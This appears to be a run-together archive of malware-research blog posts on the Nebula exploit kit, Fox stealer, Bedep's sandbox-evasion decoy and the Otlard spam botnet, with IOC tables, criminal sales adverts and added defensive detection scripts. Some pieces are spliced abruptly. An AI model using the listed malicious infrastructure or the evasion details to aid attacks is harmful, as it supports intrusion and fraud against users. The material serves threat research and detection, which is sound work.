-latest CVE-2016 CVE-2017
-custom features just ask support

Subscriptions:
24h - 100$
7d - 600$
31d - 2000$

Jabber - nebula-support@xmpp.jp


Offering free tests to trusted users 
------

In the same thread, some screenshots were shared by a customer.

Earlier that same day, colleagues at Trend Micro told me they were seeing activity in Japan from a group we are following under the name "GamiNook" (illustration coming later), redirecting traffic to a variation of Sundown.

"GamiNook" redirecting to a Sundown variation in Japan - 2017-02-17
Payload: Pitou (6f9d71eebe319468927f74b93c820ce4)

This Sundown variation was not much different from the mainstream one: no "index.php?" in the landing URI and a different domain pattern, but the same landing page, exploits, etc. Some payloads are sent in the clear (01.php), others RC4-encoded (00.php), as with Sundown.

Digging further, it appeared to feature an internal TDS (as Empire did): the exact same call would give you a different payload in France than in the United Kingdom or Japan.
"GamiNook" traffic with geo in France - 2017-02-17
An identical payload call gives you Gootkit instead of Pitou
Payload: Gootkit (48ae9a5d10085e5f6a1221cd1eedade6)
Note: to be sure that the payload difference is tied to geo and not time-based (rotation, or the operator changing it), you need to make at least a third pass with the first geo and ensure the dropped sample is identical to the one from the first pass.
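The "third pass" check from the note above, as an added example that is not Kafeine's code: the observations are constructed from the two MD5s quoted in the post, and the pass numbers and exit geos are assumed.

```python
"""Tell a geo-keyed internal TDS apart from a time-based payload rotation using the
"third pass" rule: the first geo must be replayed after the other geo's pass and still
drop the same sample.

Added example, not Kafeine's tooling; pass numbers and the grouping of MD5s by country
are constructed from the values quoted in the post."""
from collections import defaultdict

# Constructed observations: (pass number, exit geo, md5 of dropped payload).
OBSERVED = [
    (1, "JP", "6f9d71eebe319468927f74b93c820ce4"),  # Pitou, seen from Japan
    (2, "FR", "48ae9a5d10085e5f6a1221cd1eedade6"),  # Gootkit, seen from France
    (3, "JP", "6f9d71eebe319468927f74b93c820ce4"),  # Pitou again: the confirming third pass
]


def payload_selector(observations):
    """Return "geo", "time" or "inconclusive" for chronologically ordered observations."""
    by_geo = defaultdict(list)
    for pass_no, geo, digest in observations:
        by_geo[geo].append((pass_no, digest))

    # The same geo yielding different samples means the operator rotated the payload
    # (or swapped it by hand); geo alone cannot explain the difference.
    if any(len({digest for _, digest in hits}) > 1 for hits in by_geo.values()):
        return "time"

    # With a single geo, or identical samples everywhere, there is nothing to explain yet.
    if len(by_geo) < 2 or len({hits[0][1] for hits in by_geo.values()}) < 2:
        return "inconclusive"

    # Geo is only confirmed when one geo was sampled both before and after another
    # geo's pass and still got the same payload: that is the "third pass".
    for geo, hits in by_geo.items():
        first, last = hits[0][0], hits[-1][0]
        other_passes = [n for g, hs in by_geo.items() if g != geo for n, _ in hs]
        if any(first < n < last for n in other_passes):
            return "geo"
    return "inconclusive"


if __name__ == "__main__":
    print(payload_selector(OBSERVED))  # geo
```

Two passes alone (Japan then France) come back "inconclusive" on purpose: a differing sample on the second pass is exactly what a timed rotation would also produce.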


At that point one could only suspect that this Sundown variant might be Nebula (even though the clues were multiple, a funny one being that the traffic illustrated in the advert thread is quite in line with the one captured in France).

So I was naming that variation Sundown-N. Intel shared by Frank Ruiz (Fox-IT) on the 21st allowed me to know for sure that this traffic was indeed Nebula.

In the following days I saw other actors sending traffic to this EK.
Taxonomy tied to Nebula activity in MISP - 2017-03-02
Taxonomy tied to GamiNook traffic activity, EK and resulting payload

Today the URI pattern changed from this morning's:

/?yWnuAH-XgstCZ3E=tCi6ZGr10KUDHiaOgKVNolmBgpc3rkRp-weok1A2JV-gkpS0luBwQDdM
/?yXy3HX2F=tCu_Mj322aEBSXjYhatLoVmBgZJh_0Fg_wX_zQYxIg6nksDowOciFzNB
/?yXzbGV2jkcB_eU8=4ya6MDz31KdQTi7ahapLolnWjJdj_EJt-VT4mwQxIQ6gksTllrB3EGRM
/?ykjaKniEk6ZhH1-P=si-8YGj_1aANTynfh6Ye81mHhZE0_RNs_gn5nAExcV6okpTknOQgEmNN
/?z0vDa0iBu-Q=tHnqNT_-1KcGGCzfhqVKoVmB08dm_BJt-QKumQEwJA2nksGyk-QhQDRA
/?z13qMVqqoKRvTw=5S--Y2uk0apQGiyOhvdI81nQhZMwqxVo9FSsmVAyIgiokpPnl-V0QDIf
/?z1fECTiT=sy7tYmz206FUGCvagKpK9VmGhMAxrxZq_1CungQwdF71ksDowOciFzNB
/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksTllrB3EGRM
/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksW2w7QsRTIf
/?zWnBFniM=4Ca9Zjej0PRTGC3e06FJp1nVjJA1rBRpqleumABkJF2hksTllrB3EGRM
/?zn3iKU_xjeNxWw=sHu7MTry2aoAFCyKgKUY8FmF0ZZi_kFg9ASimVQ2cl-lksTllrB3EGRM
/?zy3jN0Gvi9RjY02F2g=4H27Yjn-0_EBHSrc26MfoVnV15Yx-hJqrwWrnwJjcVqnkpTknOQgEmNN

(which is Sundown/Beps without the index.php) to

/86fb7c1b/showpost.php?s=af75b6af5d0f08cf675149da13b1d3e4&p=13&postcount=8
/641222267738845/thumb/6456dac5bc39ec7/comment_post.php?ice=bDaE06lCQU
/507728217866857/9ecc534d/bug_report/media/pr.php?id=b38cb0526f8cd52d878009d9f27be8f4
/gu/Strategy/qNXL8WmQ6G/rss.php?cat=MSFT
/moddata/a9/showpost.php?s=0d2d722e1a2a625b3ceb042daf966593&p=13&postcount=1
/2003/01/27/exchange-monday-wilderness
/46198923243328031687/applications/blockStyle.php?last-name=6419f08706689953783a59fa4faeb75c
/5wtYymZeVy/LKYcSFhKOi/showpost.php?s=2e3e8a3c3b6b00cd3033f8e20d174bf5&p=8&postcount=7
/2006/08/05/fur-copper-shark
/48396170957391254103/XD25OYwON1/showpost.php?s=abf72cd40a08463fad0b3d153da66cae&p=27&postcount=7
/tV9FnNwo4h/b303debe9a6305791b9cd16b1f10b91e/promotion.php?catid=h
/ef131fb2025525a/QLGWEFwfdh/550991586389812/core.write_file.php?lawyer=9H6UhvusOi
/aPKr0Oe5GV/23861001482170285181/showpost.php?s=e74b32ba071772d5b55f97159db2e998&p=2&postcount=1
/2/eb799e65a412b412ee63150944c7826d61cd7a544f7aa57029a9069698b4925b2068ed77dea8dc6210b933e3ecf1f35b/showthread.php?t=18024&page=14
/js/archives/3f635a090e73f9b/showthread.php?t=6636&page=18
/59cdf39001a623620bd7976a42dde55f190382060a264e21809fc51f/ff0a503d59ddb4d5e1fb663b6475dfe0ba08f0b84ce8692d/viewtopic.php?f=84&t=48361
/615147354246727/339824645925013/nqHgct4sEE/showthread.php?t=51299&page=20
/2012/04/22/present-measure-physical-examination



(for those who would like to build their regexp, more patterns are available here: https://raw.githubusercontent.com/Kafeine/public/master/Nebula_URI)
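A regexp along those lines for the two landing URI styles quoted above, as an added example that is not part of the original post or the linked Nebula_URI file: the URIs in PAGE_URIS are copied from the lists above, the family names are mine, and the "random directory" heuristic is an assumption about what separates these paths from a real forum's.

```python
"""Classify exploit-kit landing URIs into the two styles quoted in the post: the
Sundown/Beps "/?key=value" style and the new Nebula paths that imitate forum and blog URLs.

Added example, not Kafeine's code or the linked Nebula_URI file. The URIs in PAGE_URIS
are copied from the post; the family names and the random-directory heuristic are mine."""
import re
from collections import Counter

# Sundown/Beps without index.php: "/?<6-24 char token>=<40+ char token>", URL-safe base64 alphabet.
SUNDOWN_BEPS = re.compile(r"^/\?[A-Za-z0-9_-]{6,24}=[A-Za-z0-9_-]{40,}$")

# Nebula's new pattern, family 1: vBulletin/phpBB-looking scripts with exactly these parameters.
FORUM_LOOKALIKE = re.compile(
    r"/(?:showpost\.php\?s=[0-9a-f]{32}&p=\d+&postcount=\d+"
    r"|showthread\.php\?t=\d+&page=\d+"
    r"|viewtopic\.php\?f=\d+&t=\d+)$"
)
# Family 2: a blog-style date path followed by a three-word slug.
DATE_SLUG = re.compile(r"^/\d{4}/\d{2}/\d{2}/[a-z]+-[a-z]+-[a-z]+$")
# Family 3: any other .php script with a single query parameter.
PHP_LOOKALIKE = re.compile(r"/[A-Za-z_.]+\.php\?[A-Za-z-]+=[A-Za-z0-9]+$")

# Heuristic (assumption): a real forum has no directory that is a long hex/decimal run or a
# 10-character mixed-case alphanumeric token in front of the script.
RANDOM_SEGMENT = re.compile(
    r"^(?:[0-9a-f]{8,}|(?=.*[a-z])(?=.*[A-Z])(?=.*\d)[A-Za-z0-9]{10})$"
)

# Copied from the two lists in the post.
PAGE_URIS = [
    "/?yWnuAH-XgstCZ3E=tCi6ZGr10KUDHiaOgKVNolmBgpc3rkRp-weok1A2JV-gkpS0luBwQDdM",
    "/?z1fECTiT=sy7tYmz206FUGCvagKpK9VmGhMAxrxZq_1CungQwdF71ksDowOciFzNB",
    "/86fb7c1b/showpost.php?s=af75b6af5d0f08cf675149da13b1d3e4&p=13&postcount=8",
    "/641222267738845/thumb/6456dac5bc39ec7/comment_post.php?ice=bDaE06lCQU",
    "/gu/Strategy/qNXL8WmQ6G/rss.php?cat=MSFT",
    "/moddata/a9/showpost.php?s=0d2d722e1a2a625b3ceb042daf966593&p=13&postcount=1",
    "/2003/01/27/exchange-monday-wilderness",
    "/js/archives/3f635a090e73f9b/showthread.php?t=6636&page=18",
    "/59cdf39001a623620bd7976a42dde55f190382060a264e21809fc51f/"
    "ff0a503d59ddb4d5e1fb663b6475dfe0ba08f0b84ce8692d/viewtopic.php?f=84&t=48361",
]


def classify_landing_uri(uri):
    """Return (family, high_confidence); family is None when no pattern matches."""
    if SUNDOWN_BEPS.match(uri):
        return "sundown-beps", True
    path = uri.partition("?")[0]
    directories = [seg for seg in path.split("/")[:-1] if seg]
    random_dir = any(RANDOM_SEGMENT.match(seg) for seg in directories)
    if DATE_SLUG.match(uri):
        return "nebula-date-slug", False  # indistinguishable from a real blog permalink
    if FORUM_LOOKALIKE.search(uri):
        return "nebula-forum-lookalike", random_dir
    if PHP_LOOKALIKE.search(uri):
        return "nebula-php-lookalike", random_dir
    return None, False


def summarize(uris):
    """Return (Counter of family -> count, number of URIs matched with high confidence)."""
    families = Counter(classify_landing_uri(u)[0] for u in uris)
    high = sum(1 for u in uris if classify_landing_uri(u)[1])
    return families, high


if __name__ == "__main__":
    for uri in PAGE_URIS:
        print(classify_landing_uri(uri), uri)
    print(summarize(PAGE_URIS))
```

The confidence flag is the point: the new pattern is built to look like vBulletin, phpBB and blog permalinks, so "/forum/showpost.php?s=...&p=13&postcount=1" from a real forum matches the same family as Nebula's "/moddata/a9/showpost.php?...". What a real forum does not have is a hex or mixed-case random directory in front of the script, and even that should be paired with the domain and IP IOCs from the post before it is turned into an alert.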


2017-03-02 Nebula with its new pattern used here to drop Ramnit via Malvertising in NA - 2017-03-02

This landing pattern change triggered the publication of this post. Nebula might end up not being a "vapour" EK, but let's wait and see. Until today, its only difference from Sundown was the internal TDS.

Exploits:
CVE-2014-6332 + CVE-2015-0016
CVE-2013-2551
CVE-2016-0189 godmode
CVE-2015-8651
CVE-2015-7645
CVE-2016-4117

Files:  Nebula_2017-03-02 (2 Fiddler captures - password is malware)

Acknowledgement :
Thanks to Joseph C Chen and Brooks Li (Trend Micro), Frank Ruiz (Fox-IT InTELL) and Andrew Komarov (InfoArmor Inc.) for their help on different aspects of this post.

Edit:
2017-03-03 Corrected some CVE IDs; not all payloads are sent in the clear
---
Some IOCs

Date | SHA-256 | Comment
2017/02/17 | f4627005c018071f8ec6b084eef3936e3a267660b0df99ffa0d27a8d943d1af5 | Flash Exploit (CVE-2016-4117)
2017/02/27 | be86dc88e6337f09999991c206f890e0d52959d41f2bb4c6515b5442b23f2ecc | Flash Exploit (CVE-2016-4117)
2017/02/17 | 67d598c6acbd6545ab24bbd44cedcb825657746923f47473dc40d0d1f122abb6 | Flash Exploit (CVE-2015-7645, sample seen previously in Sundown)
2017/02/17 | 04fb00bdd3d2c0667b18402323fe7cf495ace5e35a4562e1a30e14b26384f41c | Flash Exploit (CVE-2015-8651, sample seen previously in Sundown)
2017/02/17 | b976cf6fd583b349e51cb34b73de6ef3a5ee72f86849f847b9158b4a7fb2315c | Pitou
2017/02/17 | 6fe13d913f4d3f2286f67fbde08ab17418ba8370410e52354ffa12a0aaf498f8 | Gootkit
2017/02/22 | 1a22211d01d2e8746efe0d14ab7e1e547c3e30863a83e0884a9d90325bd7b64b | Ramnit
2017/03/02 | 6764f98ba6509b3351ad2f960dcc47c27d0dc00d53d7e0ae132a7c1d15067f4a | DiamondFox


Date | Domain | IP | Comment
2017/02/17 | tci.nhnph.com | 188.209.49.135 | Nebula Payload Domain
2017/02/22 | gnd.lplwp.com | 188.209.49.135 | Nebula Payload Domain
2017/02/24 | qcl.ylk8.xyz | 188.209.49.23 | Nebula Payload Domain
2017/02/28 | hmn.losssubwayquilt.pw | 93.190.141.166 | Nebula Payload Domain
2017/03/02 | qgg.losssubwayquilt.pw | 93.190.141.166 | Nebula Payload Domain
2017/02/17 | agendawedge.shoemakerzippersuccess.stream | 188.209.49.135 | Nebula
2017/02/17 | clausmessage.nationweekretailer.club | 217.23.7.15 | Nebula
2017/02/17 | equipmentparticle.shockadvantagewilderness.club | 217.23.7.15 | Nebula
2017/02/17 | salaryfang.shockadvantagewilderness.club | 217.23.7.15 | Nebula
2017/02/22 | deficitshoulder.lossicedeficit.pw | 188.209.49.135 | Nebula
2017/02/22 | distributionjaw.hockeyopiniondust.club | 188.209.49.135 | Nebula
2017/02/22 | explanationlier.asiadeliveryarmenian.pro | 188.209.49.135 | Nebula
2017/02/23 | cowchange.distributionstatementdiploma.site | 188.209.49.151 | Nebula
2017/02/23 | instructionscomposition.pheasantmillisecondenvironment.stream | 188.209.49.151 | Nebula
2017/02/23 | paymentceramic.pheasantmillisecondenvironment.stream | 188.209.49.151 | Nebula
2017/02/23 | soldierprice.distributionstatementdiploma.site | 188.209.49.135 | Nebula
2017/02/23 | swissfacilities.gumimprovementitalian.stream | 188.209.49.135 | Nebula
2017/02/23 | transportdrill.facilitiesturkishdipstick.info | 188.209.49.135 | Nebula
2017/02/24 | authorisationmessage.casdfble.stream | 188.209.49.151 | Nebula
2017/02/24 | cowchange.distributionstatementdiploma.site | 188.209.49.151 | Nebula
2017/02/24 | departmentant.distributionstatementdiploma.site | 188.209.49.151 | Nebula
2017/02/24 | disadvantageproduction.brassreductionquill.site | 188.209.49.151 | Nebula
2017/02/24 | disadvantageproduction.casdfble.stream | 188.209.49.151 | Nebula
2017/02/24 | europin.pedestrianpathexplanation.info | 188.209.49.151 | Nebula
2017/02/24 | hygienicreduction.brassreductionquill.site | 188.209.49.151 | Nebula
2017/02/24 | hygienicreduction.casdfble.stream | 188.209.49.151 | Nebula
2017/02/24 | instructionscomposition.pheasantmillisecondenvironment.stream | 188.209.49.151 | Nebula
2017/02/24 | jobhate.pedestrianpathexplanation.info | 188.209.49.151 | Nebula
2017/02/24 | limitsphere.pheasantmillisecondenvironment.stream | 188.209.49.151 | Nebula
2017/02/24 | paymentceramic.pheasantmillisecondenvironment.stream | 188.209.49.151 | Nebula
2017/02/24 | penaltyinternet.asiadeliveryarmenian.pro | 188.209.49.151 | Nebula
2017/02/24 | phonefall.asiadeliveryarmenian.pro | 188.209.49.151 | Nebula
2017/02/24 | printeroutput.pheasantmillisecondenvironment.stream | 188.209.49.151 | Nebula
2017/02/24 | redrepairs.distributionstatementdiploma.site | 188.209.49.151 | Nebula
2017/02/24 | soldierprice.distributionstatementdiploma.site | 188.209.49.151 | Nebula
2017/02/24 | suggestionburn.distributionstatementdiploma.site | 188.209.49.151 | Nebula
2017/02/25 | advertiselaura.bubblecomparisonwar.top | 188.209.49.49 | Nebula
2017/02/25 | apologycattle.gramsunshinesupply.club | 188.209.49.151 | Nebula
2017/02/25 | apologycattle.gramsunshinesupply.club | 188.209.49.49 | Nebula
2017/02/25 | apologycattle.gramsunshinesupply.club | 93.190.141.39 | Nebula
2017/02/25 | apologycold.shearssuccessberry.club | 188.209.49.151 | Nebula
2017/02/25 | authorizationmale.foundationspadeinventory.club | 188.209.49.151 | Nebula
2017/02/25 | birthdayexperience.foundationspadeinventory.club | 188.209.49.151 | Nebula
2017/02/25 | confirmationaustralian.retaileraugustplier.club | 188.209.49.151 | Nebula
2017/02/25 | dancerretailer.shearssuccessberry.club | 188.209.49.151 | Nebula
2017/02/25 | employergoods.deliverycutadvantage.info | 188.209.49.151 | Nebula
2017/02/25 | fallhippopotamus.deliverycutadvantage.info | 188.209.49.151 | Nebula
2017/02/25 | goallicense.shearssuccessberry.club | 188.209.49.151 | Nebula
2017/02/25 | goalpanda.retaileraugustplier.club | 188.209.49.151 | Nebula
2017/02/25 | holidayagenda.retaileraugustplier.club | 188.209.49.151 | Nebula
2017/02/25 | marketsunday.deliverycutadvantage.info | 188.209.49.151 | Nebula
2017/02/25 | penaltyinternet.asiadeliveryarmenian.pro
Gift for SweetTail-Fox-mlp
 by Mad-N-Monstrous


Small data drop about another Pony fork: Fox stealer.
The first sample of this malware I saw was at the beginning of September 2016, thanks to Malc0de. After figuring out the panel name and the advert it was tied to, we were referring to it as PonyForx.

Advert:
2016-08-11 - Sold underground by a user going by the nickname "Cronbot"

--------
(Advert originally posted in Russian; English translation based on Jack Urban's)

Password stealer and more - Fox v1.0

We are releasing the product for general sale. The final stage of testing for this product is already underway.

About the product:
1. Is able to do everything that Pony does, plus new software has been added.
2. Relevant for 2016.
3. Written in C++ without additional libraries.
4. Admin panel from Pony.

Conditions:
1. For rent only.
2. Distributed as an EXE and DLL.
3. We will not be selling the source.

Rent is $250 a month.
Source code is a $2000 one-time fee.
--------

It is being loaded (alongside Locky Affid 13) by the Godzilla loader of the ScriptJS (aka AfraidGate) group.

MISP taxonomy tags reflecting ScriptJS activity in the last months
(note: this is not the first time this group has pushed a stealer; they were dropping Pony with their Necurs between August and December 2015 [1])

2016-09-26 - ScriptJS infection chain into Neutrino into Godzilla loader into PonyForx and Locky Affid 13
Here we can see the browsing history of the VM being sent to the PonyForx (Fox stealer) C2

Fox stealer (PonyForx) fingerprint in Cuckoo

Sample :
Associated C2:
blognetoo[.]com/find.php/hello
blognetoo[.]com/find.php/data
blognetoo[.]com|104.36.83.52
blognetoo[.]com|45.59.114.126
Caught by ET rule:
2821590 || ETPRO TROJAN Win32.Pony Variant Checkin

[1] ScriptJS's Pony:
master.districtpomade[.]com|188.166.54.203 - 2015-08-15 Pony C2 from ScriptJS
js.travelany[.]com[.]ve|185.80.53.18 - 2015-12-10 Pony C2 from ScriptJS

Read More:
http://pastebin.com/raw/uKLhTbLs few bits about ScriptJS

Bedep has raised its game vs Bot Zombies
Simulacra & Simulation - Jean Baudrillard
Featured in Matrix
Bedep could be described as a fileless loader with a resident module that can optionally perform AdFraud. It is closely tied to Angler EK and appeared around August 2014.

On 2016-03-24 I noticed several changes in Bedep.

Angler infecting a VM and integrating it into an instance of Bedep botnet
2016-03-24
There is no longer a variable in the URI (as several months before), the protocol key changed, and in most of my manual checks all threads were sending a strange payload in the first stream.

2 KB in size for Win7 64-bit:
80eb8a6aba5e6e70fb6c4032242e9ae82ce305d656b4ed8b629b24e1df0aef9a
Popup shown by the first payload from Bedep Stream - Win7
(in the background Angler Landing)

48 KB in size for WinXP 32-bit:
a0fe4139133ddb62e6db8608696ecdaf5ea6ca79b5e049371a93a83cbcc8e780

Popup shown by the first payload from Bedep Stream - WinXP

Looking at my traffic, I thought for some time that one of the Bedep instances had been split in two.

Then I understood that I was getting different results on my "manually" driven VM (on VMware ESXi) and my automated Cuckoo-driven one (on VirtualBox). I suspected it was related to hardening, as this is one of the main differences between those two systems.

And I got confirmation. Here is an example from GooNky ([1] [2] [3]) malvertising traffic in Australia:

A VM not hardened enough against Bedep got redirected to a "decoy" instance of Bedep that I will refer to as:
Bedep "Robot Town" - 2016-04-12
Now look at what I get instead with a VM that is not spotted as one:
Same Angler thread - VM not detected. 1st Stream gets Vawtrak
2016-04-12


I am not skilled enough to give you the list of checks Bedep is doing. But here is one of them, spotted by Cuckoo:

Bedep doing some ACPI checks
I think there are multiple levels of checks. Some result in Bedep not trying to contact the C&C at all; for others, a positive check ends up with a different seed for the Bedep DGA, redirecting spotted machines into a dedicated instance.
This is quite powerful:
- the checks are made without dropping an executable.
- if you don't know what to expect, it's quite difficult to figure out that you have been trapped.
- there is a lot that operators can do with this list of known bots and initial Bedep thread IDs.

One of them is, for instance, knowing which of the infection paths are researcher/bot "highways":

Illustration for Bedep "Robot Town" from an "infection path" focused point of view

This could be just a move to perform different tasks (AdFraud only (?)) on VMs, but my guess is that this Bedep evolution on 2016-03-24 is a fast reaction to this Proofpoint blog from 2016-03-18, which shows how Bedep threads are additional connectable dots.

Sharing publicly is often a difficult decision. The question is which side benefits the most from it in the long run.

For researchers:
In the last 3 weeks, if your VM has communicated with:
95.211.205.228 (a Bedep IP from the end of 2015, reused) || ( 85.25.41.95
 && http.uri.path "ads.php?sid=1901" ) and you are interested in the "real payload", then you might want to give PAfish a run.

Sad little robot from "Robots" movie
On the other hand, any of your VMs which has communicated with 104.193.252.245 (Bedep "standard" 18xx/19xx instance) since the 24th of March is hardened enough to grab the real payload.
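As an added example (not code from the original post), here is a small Python scanner that applies the researcher check above to HTTP proxy log lines: a VM is flagged as having reached the decoy Bedep instance if it talked to 95.211.205.228, or to 85.25.41.95 with the ads.php?sid=1901 URI, and as hardened enough if it reached the "standard" 104.193.252.245 instance. The indicator values are the ones in the post; the log format (timestamp, source IP, destination IP, method, URI) and the sample lines are constructed assumptions for the demo.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Indicators from the post: the decoy ("Robot Town") conditions and the standard instance.
DECOY_IP = "95.211.205.228"                 # reused end-of-2015 Bedep IP
DECOY_IP_WITH_URI = "85.25.41.95"           # decoy only when combined with the URI marker
DECOY_URI_MARKER = "ads.php?sid=1901"
STANDARD_IP = "104.193.252.245"             # Bedep "standard" 18xx/19xx instance

# Assumed log layout: "<timestamp> <src_ip> <dst_ip> <METHOD> <uri>" (one request per line).
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<method>[A-Z]+) (?P<uri>\S+)$")

# Constructed sample proxy log; the sid=1877 line is a deliberate near-miss.
SAMPLE_LOG = """\
2016-04-12T10:01:03Z 10.0.0.5 95.211.205.228 GET /
2016-04-12T10:02:11Z 10.0.0.6 85.25.41.95 GET /ads.php?sid=1901
2016-04-12T10:02:40Z 10.0.0.7 85.25.41.95 GET /ads.php?sid=1877
2016-04-12T10:03:05Z 10.0.0.8 104.193.252.245 GET /
2016-04-12T10:04:00Z 10.0.0.9 203.0.113.7 GET /
"""


@dataclass
class Hit:
    vm: str       # source (analysis VM) IP
    dst: str      # Bedep IP contacted
    uri: str
    verdict: str  # "decoy-instance ..." or "standard-instance"


def classify(dst: str, uri: str) -> Optional[str]:
    """Return a verdict string for one request, or None if it matches no indicator."""
    if dst == DECOY_IP:
        return "decoy-instance (reused 2015 Bedep IP)"
    if dst == DECOY_IP_WITH_URI and DECOY_URI_MARKER in uri:
        return "decoy-instance (ads.php?sid=1901)"
    if dst == STANDARD_IP:
        return "standard-instance"
    return None


def scan(lines: List[str]) -> List[Hit]:
    """Parse each log line and keep the ones that hit a Bedep indicator."""
    hits: List[Hit] = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip blank or malformed lines rather than failing the whole scan
        verdict = classify(m["dst"], m["uri"])
        if verdict is not None:
            hits.append(Hit(vm=m["src"], dst=m["dst"], uri=m["uri"], verdict=verdict))
    return hits


def vms_needing_hardening(hits: List[Hit]) -> List[str]:
    """VMs that were sent to the decoy instance: candidates for a PAfish run."""
    return sorted({h.vm for h in hits if h.verdict.startswith("decoy")})


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for h in found:
        print(f"{h.vm} -> {h.dst} {h.uri}: {h.verdict}")
    print("needs hardening:", vms_needing_hardening(found))
```

The sid=1877 request to 85.25.41.95 is left unflagged on purpose: the post only ties that IP to the decoy instance together with the sid=1901 path, so the scanner requires both conditions before it labels a VM.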

[Edits]
- Removed the AU-focused mention on the Vawtrak. I have been told (thanks!) it's US-focused. Got geo-glitched. Maybe more about that one day or another.
- Refined the check conditions for researchers. IP 85.25.41.95 and sid=1901...otherwise...ok :)
[/Edits]

Acknowledgements:
Thanks Will Metcalf and Malc0de for the discussions and help on this topic
--
I'm sorry, but I must do it...Greetings to Angler and Bedep guys. ;) You are keeping us busy...and awake!

Reading:
Bedep's DGA: Trading Foreign Exchange for Malware Domains - 2015-04-21 - Dennis Schwarz - Arbor ASERT



Inside Jahoo (Otlard.A ?) - A spam Botnet
Trash and Mailbox by Bethesda Softworks

Otlard.A (or, let's say, at least the malware triggering 2806902 || ETPRO TROJAN Win32.Otlard.A C&C Checkin response) is a spam botnet.

I saw it loaded as a plugin in an instance of Andromeda.

That Andromeda is being spread via:


  • Bedep build id 6005 and here 6007 from an Angler EK fed by malvertising:

VirtualDonna group redirecting traffic to an Angler instance loading Bedep buildid 6007 in memory
Bedep 6007 loading Andromeda 55ead0e4010c7c1a601511286f879e33 before update task.
2015-09-28

Note: Bedep 6007 was sometimes loading it alongside other payloads
- 2015-09-16 for ec5d314fc392765d065ff16f21722008, with Trapwot (FakeAV) e600985d6797dec2f7388e86ae3e82ba and Pony a4f08c845cc8e2beae0d157a3624b686
- 2015-09-29 for 37898c10a350651add962831daa4fffa, with Kovter (24143f110e7492c3d040b2ec0cdfa3d0)

That Andromeda beaconing to dnswow .com enslaved >10k bots in a week:
Andromeda dnswow 2015-11-22

Andromeda dnswow 2015-11-27
Here is the Otlard.A task in that Andromeda instance:
Task installing Otlard.A as a plugin to Andromeda

  • a task in a Smokebot dropped by Nuclear Pack fed by malvertising:
Malvertising > Nuclear Pack > Smokebot > Stealer, Ramnit, Htbot and Andromeda > Otlard.A
2015-11-28
Smokebot: cde587187622d5f23e50b1f5b6c86969
Andromeda: b75f4834770fe64da63e42b8c90c6fcd
(Off topic, Ramnit: 28ceafaef592986e4914bfa3f4c7f5c0. It is being massively spread these days in many infection paths. Edit 2015-12-29: Htbot.B: d0a14abe51a61c727420765f72de843a, named ProxyBack by PaloAlto)

Now here is what the control panel of that plugin looks like:

Otlard.A panel:


Otlard.A - JahooManager - Main - 2015-09-27
Otlard.A - JahooManager - Servers - 2015-09-27
Otlard.A - JahooManager - Settings - 2015-09-27
Otlard.A - JahooManager - Campaigns - 2015-09-27
Otlard.A - JahooManager - Bot - 2015-09-27
That exe is 2387fb927e6d9d6c027b4ba23d8c3073 and appears to be Andromeda





Otlard.A - JahooSender - Tasks - 2015-09-27

Otlard.A - JahooSender - Tasks - 2015-11-28



Otlard.A - JahooSender - Tasks - Done Task - 2015-09-27
Otlard.A - JahooSender - Domains - 2015-09-27
Otlard.A - JahooSender - Domains - 2015-11-28

Otlard.A - JahooSender - Messages - 2015-09-27
Otlard.A - JahooSender - Messages - 2015-11-28
Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28
Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28
Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28
Otlard.A - JahooSender - Headers - 2015-11-28
Otlard.A - JahooSender - Headers - Editing Header - 2015-11-28
Otlard.A - JahooSender - Headers - Editing Header - 2015-11-28
Otlard.A - JahooSender - Macross - 2015-11-28

Otlard.A - JahooSender - Macross - 2015-11-28


Otlard.A - JahooSender - Macross - Editing macross - 2015-11-28
Otlard.A - JahooSender  - Macross - Editing macross - 2015-11-28
Otlard.A - JahooSender - Macross - Editing macross - 2015-11-28
Otlard.A - JahooSender - Attach - 2015-11-28
Otlard.A - JahooSender - Attach - Attached image - 2015-11-28
Otlard.A - JahooSender - Rules - 2015-11-28
Otlard.A - JahooSender - Rules > Spam - 2015-11-28
Otlard.A - JahooSender - Rules > User - 2015-11-28
Otlard.A - Bases - Emails - 2015-11-28
Otlard.A - Bases - Blacklist - 2015-11-28
Otlard.A - Bases - Blacklist - Edit - 2015-11-28
Otlard.A - Botnet - Main - 2015-09-27
Otlard.A - Botnet - Main - 2015-11-28
Otlard.A - Botnet - Modules - 2015-11-28
Otlard.A - Botnet - Modules - Edit - 2015-11-28
Otlard.A - Incubator - Accounts - 2015-11-28
Otlard.A - Incubator - Settings - 2015-11-28
Note: the registrator menu has disappeared in the last version.


--
Andromeda C&C 2015-11-28:
5.8.35.241
202023 | 5.8.35.0/24 | LLHOST | EU | llhost-inc.com | LLHost Inc

Spam Module C&C 2015-11-28:

5.8.32.10 
5.8.32.8
5.8.32.52
5.8.34.20
5.8.32.53
5.8.32.56
202023 | 5.8.32.0/24 | LLHOST | EU | zanufact.com | LLHost Inc

Thanks: Brett Stone-Gross for helping me with decoding/understanding the network communications

Files:
All samples whose hashes have been discussed here are in that zip.
Jahoo - socker.dll : 7d14c9edfd71d2b76dd18e3681fec798
(If you want to look into this, I can provide the associated network traffic)

Read More:

Inside Andromeda Bot v2.06 Webpanel / AKA Gamarue - Botnet Control Panel 2012-07-02
Inside Pony 1.7 / Fareit C&C - Botnet Control Panel - 2012-06-27
Inside Smoke Bot - Botnet Control Panel - 2012-04-28

Post-publication Reading:
ProxyBack Malware Turns User Systems Into Proxies Without Consent - 2015-12-23 - JeffWhite - PaloAlto
Network Security Today | @CloudExpo #Cloud #AI #SDN #Security #Analytics
In its 2017 State of Malware Report, Malwarebytes Labs recorded a 267 percent increase in ransomware between January 2016 and November 2016, with over 400 different variants in total. The report noted that while malware authors mostly relied on ransomware to make the bulk of their revenues, there was an increase in ad fraud as well. Botnets and mobile malware also continue to expand and evolve. The report predicts that until IoT devices become secure out of the box, botnets will get even bigger and pose an even greater threat to the internet – and any company connected to it.


Using DNS as a C2 channel
